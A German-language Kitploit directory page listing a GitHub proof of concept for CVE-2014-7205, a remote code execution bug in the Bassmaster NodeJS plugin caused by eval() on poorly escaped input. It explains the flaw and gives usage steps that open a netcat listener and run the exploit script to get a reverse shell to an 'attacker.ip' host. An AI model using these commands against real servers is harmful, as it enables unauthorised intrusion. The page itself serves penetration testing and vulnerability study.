Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2014-7205 — Bassmaster Plugin NodeJS RCE | Kitploit
Tools/GitHubGitHub/andrewtrube/cve-2014-7205
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsShellcode-Generierung
GitHubandrewtrube/cve-2014-7205

CVE-2014-7205

Bassmaster Plugin NodeJS RCE

Repository anzeigen
vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Bassmaster NodeJS Plugin RCE PoC

bassmaster-rce.py: Ein Python-Skript zur Ausnutzung von CVE-2014-7205. nodeshell.py: Ein Python-Modul zum Erzeugen einer Reverse Shell für NodeJS

!!Nur gegen Server verwenden, auf denen Sie die Erlaubnis zum Testen haben

Zusammenfassung

CVE-2014-7205 ist eine Schwachstelle zur Remote-Code-Ausführung im Bassmaster-Plugin für NodeJS. Alle Versionen <= 1.5.1 sind betroffen. Die Schwachstelle existiert in der Datei lib/batch.js in der Funktion internals.batch, wo ein Aufruf von eval() falsch maskierte Benutzereingaben verwendet (im Grunde prüft der reguläre Ausdruck nicht, ob die Anfragen bösartigen Code enthalten).

Proof of Concept

  1. Git-Repo herunterladen oder klonen
  2. Netcat-Listener im Bash-Terminal öffnen nc -lvp 4444
  3. Sicherstellen, dass bassmaster-rce.py und nodeshell.py im selben Ordner sind
  4. bassmaster-rce.py ausführen python3 bassmaster-rce.py -u http://target -p 8080 -l attacker.ip -P 4444

Sonstiges

  • nodeshell.py ist vollständig auf andere PoCs und Exploits übertragbar, die Python verwenden und ebenfalls eine Reverse Shell für NodeJS erzeugen müssen.
Tool herunterladen